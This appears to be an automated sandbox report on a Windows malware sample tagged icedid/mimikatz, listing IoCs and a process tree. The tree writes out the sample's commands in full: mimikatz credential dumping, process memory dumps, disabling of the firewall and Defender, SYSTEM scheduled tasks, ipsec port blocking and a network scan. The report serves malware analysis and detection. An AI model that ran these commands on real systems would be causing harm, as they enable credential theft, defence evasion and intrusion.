\REGISTRY\USER\.DEFAULT\Software\Sysinternals ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" vkdejee.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2916 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 5016 vkdejee.exe Token: SeDebugPrivilege 316 vkdejee.exe Token: SeDebugPrivilege 3132 vfshost.exe Token: SeDebugPrivilege 3540 ibibzztte.exe Token: SeLockMemoryPrivilege 3492 fpibei.exe Token: SeLockMemoryPrivilege 3492 fpibei.exe Token: SeDebugPrivilege 3112 ibibzztte.exe Token: SeDebugPrivilege 4240 ibibzztte.exe Token: SeDebugPrivilege 4724 ibibzztte.exe Token: SeDebugPrivilege 3772 ibibzztte.exe Token: SeDebugPrivilege 2708 ibibzztte.exe Token: SeDebugPrivilege 4440 ibibzztte.exe Token: SeDebugPrivilege 4464 ibibzztte.exe Token: SeDebugPrivilege 1812 ibibzztte.exe Token: SeDebugPrivilege 1036 ibibzztte.exe Token: SeDebugPrivilege 2452 ibibzztte.exe Token: SeDebugPrivilege 5040 ibibzztte.exe Token: SeDebugPrivilege 392 ibibzztte.exe Token: SeDebugPrivilege 1832 ibibzztte.exe Token: SeDebugPrivilege 4268 ibibzztte.exe Token: SeDebugPrivilege 5108 ibibzztte.exe Token: SeDebugPrivilege 4060 ibibzztte.exe Token: SeDebugPrivilege 4328 ibibzztte.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 5016 vkdejee.exe 5016 vkdejee.exe 316 vkdejee.exe 316 vkdejee.exe 652 xohudmc.exe 1452 wokakm.exe 5000 vkdejee.exe 5000 vkdejee.exe 3876 vkdejee.exe 3876 vkdejee.exe 4736 vkdejee.exe 4736 vkdejee.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2976 wrote to memory of 1832 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 83 PID 2976 wrote to memory of 1832 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 83 PID 2976 wrote to memory of 1832 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe 83 PID 1832 wrote to memory of 2916 1832 cmd.exe 86 PID 1832 wrote to memory of 2916 1832 cmd.exe 86 PID 1832 wrote to memory of 2916 1832 cmd.exe 86 PID 1832 wrote to memory of 5016 1832 cmd.exe 92 PID 1832 wrote to memory of 5016 1832 cmd.exe 92 PID 1832 wrote to memory of 5016 1832 cmd.exe 92 PID 316 wrote to memory of 1660 316 vkdejee.exe 94 PID 316 wrote to memory of 1660 316 vkdejee.exe 94 PID 316 wrote to memory of 1660 316 vkdejee.exe 94 PID 1660 wrote to memory of 3676 1660 cmd.exe 96 PID 1660 wrote to memory of 3676 1660 cmd.exe 96 PID 1660 wrote to memory of 3676 1660 cmd.exe 96 PID 1660 wrote to memory of 1196 1660 cmd.exe 97 PID 1660 wrote to memory of 1196 1660 cmd.exe 97 PID 1660 wrote to memory of 1196 1660 cmd.exe 97 PID 1660 wrote to memory of 3680 1660 cmd.exe 98 PID 1660 wrote to memory of 3680 1660 cmd.exe 98 PID 1660 wrote to memory of 3680 1660 cmd.exe 98 PID 1660 wrote to memory of 532 1660 cmd.exe 99 PID 1660 wrote to memory of 532 1660 cmd.exe 99 PID 1660 wrote to memory of 532 1660 cmd.exe 99 PID 1660 wrote to memory of 4572 1660 cmd.exe 100 PID 1660 wrote to memory of 4572 1660 cmd.exe 100 PID 1660 wrote to memory of 4572 1660 cmd.exe 100 PID 1660 wrote to memory of 1712 1660 cmd.exe 101 PID 1660 wrote to memory of 1712 1660 cmd.exe 101 PID 1660 wrote to memory of 1712 1660 cmd.exe 101 PID 316 wrote to memory of 4088 316 vkdejee.exe 102 PID 316 wrote to memory of 4088 316 vkdejee.exe 102 PID 316 wrote to memory of 4088 316 vkdejee.exe 102 PID 316 wrote to memory of 4472 316 vkdejee.exe 104 PID 316 wrote to memory of 4472 316 vkdejee.exe 104 PID 316 wrote to memory of 4472 316 vkdejee.exe 104 PID 316 wrote to memory of 3532 316 vkdejee.exe 106 PID 316 wrote to memory of 3532 316 vkdejee.exe 106 PID 316 wrote to memory of 3532 316 vkdejee.exe 106 PID 316 wrote to memory of 1980 316 vkdejee.exe 111 PID 316 wrote to memory of 1980 316 vkdejee.exe 111 PID 316 wrote to memory of 1980 316 vkdejee.exe 111 PID 1980 wrote to memory of 3572 1980 cmd.exe 113 PID 1980 wrote to memory of 3572 1980 cmd.exe 113 PID 1980 wrote to memory of 3572 1980 cmd.exe 113 PID 3572 wrote to memory of 5096 3572 wpcap.exe 114 PID 3572 wrote to memory of 5096 3572 wpcap.exe 114 PID 3572 wrote to memory of 5096 3572 wpcap.exe 114 PID 5096 wrote to memory of 2584 5096 net.exe 116 PID 5096 wrote to memory of 2584 5096 net.exe 116 PID 5096 wrote to memory of 2584 5096 net.exe 116 PID 3572 wrote to memory of 2140 3572 wpcap.exe 117 PID 3572 wrote to memory of 2140 3572 wpcap.exe 117 PID 3572 wrote to memory of 2140 3572 wpcap.exe 117 PID 2140 wrote to memory of 680 2140 net.exe 119 PID 2140 wrote to memory of 680 2140 net.exe 119 PID 2140 wrote to memory of 680 2140 net.exe 119 PID 3572 wrote to memory of 4804 3572 wpcap.exe 120 PID 3572 wrote to memory of 4804 3572 wpcap.exe 120 PID 3572 wrote to memory of 4804 3572 wpcap.exe 120 PID 4804 wrote to memory of 3452 4804 net.exe 122 PID 4804 wrote to memory of 3452 4804 net.exe 122 PID 4804 wrote to memory of 3452 4804 net.exe 122 PID 3572 wrote to memory of 1960 3572 wpcap.exe 123
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1440
-
C:\Windows\TEMP\rttutifin\fpibei.exe"C:\Windows\TEMP\rttutifin\fpibei.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gibpmken\vkdejee.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2916
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5016
-
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3676
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3680
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4572
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1712
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3532
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\umubtmbps\bbrcgicuu\wpcap.exeC:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2584
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:680
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:3452
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3016
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:436
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:440
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2596
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt2⤵PID:4648
-
C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exeC:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\umubtmbps\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4924 -
C:\Windows\umubtmbps\Corporate\vfshost.exeC:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"2⤵PID:4616
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"3⤵
- Creates scheduled task(s)
PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"2⤵PID:3088
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"2⤵PID:3360
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:5112
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:3952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:5088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1140
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2564
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4168
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:4608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:2236
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3436
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4116
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3316
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1576
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1840
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:4724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4460
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:1752
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4228
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1304
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:3768
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4800
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:1932
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:5024
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3116
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:3088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:3856
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3068
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:860
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:652
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 780 C:\Windows\TEMP\umubtmbps\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 388 C:\Windows\TEMP\umubtmbps\388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1440 C:\Windows\TEMP\umubtmbps\1440.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2480 C:\Windows\TEMP\umubtmbps\2480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2720 C:\Windows\TEMP\umubtmbps\2720.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2760 C:\Windows\TEMP\umubtmbps\2760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3092 C:\Windows\TEMP\umubtmbps\3092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3860 C:\Windows\TEMP\umubtmbps\3860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3956 C:\Windows\TEMP\umubtmbps\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4024 C:\Windows\TEMP\umubtmbps\4024.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 884 C:\Windows\TEMP\umubtmbps\884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4480 C:\Windows\TEMP\umubtmbps\4480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1468 C:\Windows\TEMP\umubtmbps\1468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1348 C:\Windows\TEMP\umubtmbps\1348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2168 C:\Windows\TEMP\umubtmbps\2168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4868 C:\Windows\TEMP\umubtmbps\4868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4604 C:\Windows\TEMP\umubtmbps\4604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 468 C:\Windows\TEMP\umubtmbps\468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\umubtmbps\bbrcgicuu\scan.bat2⤵PID:1304
-
